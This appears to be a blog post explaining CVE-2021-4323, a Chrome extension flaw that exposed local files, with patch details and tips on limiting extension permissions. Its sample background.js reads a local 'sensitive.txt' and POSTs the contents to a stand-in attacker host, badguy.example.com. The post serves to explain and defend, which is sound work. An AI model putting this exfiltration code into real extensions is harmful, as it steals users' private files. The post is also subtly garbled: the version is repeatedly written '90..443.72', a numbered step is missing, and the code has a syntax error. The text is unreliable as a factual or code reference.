When we use web browsers, especially popular ones like Google Chrome, we trust them to keep our private files safe. But in early 2021, a vulnerability tracked as CVE-2021-4323 showed that not all Chrome Extensions could be trusted with your local data. In this post, we’ll break down what this bug was, how it worked, show some example code, and give you tips to protect yourself.
What Is CVE-2021-4323?
CVE-2021-4323 is a security flaw in Chrome’s extension system, present in Chrome versions before 90..443.72. The problem was: Extensions were not properly checking or validating where they got their input from.
This meant if you installed a poorly-coded or intentionally evil extension, it could trick Chrome into letting it access your local files—stuff you never meant for a browser or website to see.
Severity: Medium
Discovered: 2021
Affected product: Google Chrome (before 90..443.72)
Component: Extensions
Chromium Bug report: Issue 1185925
The attack worked like this
1. An attacker creates a malicious Chrome Extension, uploads it to the Chrome Web Store, or encourages users to install it directly (maybe pretending it does something useful).
The extension uses Chrome's extension API to ask the browser to access files.
3. Because Chrome didn’t sufficiently validate untrusted input meant for file access, the extension could point to local files (like file://C:/Users/YourName/Documents/somefile.txt on Windows).
Now the attacker’s extension can read—and possibly leak—your local data!
Important: This only happened if you *installed an offending extension*. If you only used trusted, well-known extensions, you were very likely safe.
background.js
chrome.runtime.onMessage.addListener(function(request, sender, sendResponse) {
if(request.action === 'readFile') {
// This shouldn't be allowed: reading local files directly
fetch('file:///C:/Users/YourName/Documents/sensitive.txt')
.then(response => response.text())
.then(data => {
// Send file contents to attacker's server
fetch('https://badguy.example.com/steal';, {
method: 'POST',
body: JSON.stringify({data: data}),
headers: {'Content-Type': 'application/json'}
});
});
}
});
This simple code could be triggered by a command from the attacker’s website or even your browsing activity. Notice how it uses the fetch() function to try to grab your personal file, then sends it to the attacker's site.
Normally, Chrome would block a random webpage from getting at your files. But thanks to the extension’s high privilege, this kind of attack could work if the extension abused the API and Chrome's checks were too weak.
Chromium's Response and Fix
As soon as Google was alerted to this bug, its security team updated Chrome to block this kind of activity in version 90. So if you're running Chrome 90..443.72 or later, you're safe from this specific flaw.
You can check what version you’re running by typing this into the address bar
chrome://settings/help
The fix was to better validate and restrict file access from extensions, making sure they couldn’t just point at any path (especially local files) unless you gave explicit permission.
Reference / Patch:
- Release notes for 90..443.72
- Chromium bug tracker: Issue 1185925
Regularly review your installed extensions. Remove anything outdated or that you don’t use.
- Limit permissions. Chrome asks if you want to let extensions access “all sites” or your file system—say no unless you really trust them.
Keep your browser updated. Security fixes happen frequently.
Go to chrome://extensions/ to manage what you have installed.
Final Thoughts
CVE-2021-4323 wasn’t a bug anyone outside the security world was likely to notice, but it shows how even everyday browser features can open up holes for attackers. Modern browsers are always fighting to close these loopholes—but your choices matter too! Use only trustworthy extensions and keep Chrome up to date.
Links for more information
- Official Chrome Security Advisories
- Chromium Security Guide
- CVE-2021-4323 at NIST
Timeline
Published on: 07/29/2023 00:15:00 UTC
Last modified on: 08/02/2023 03:57:00 UTC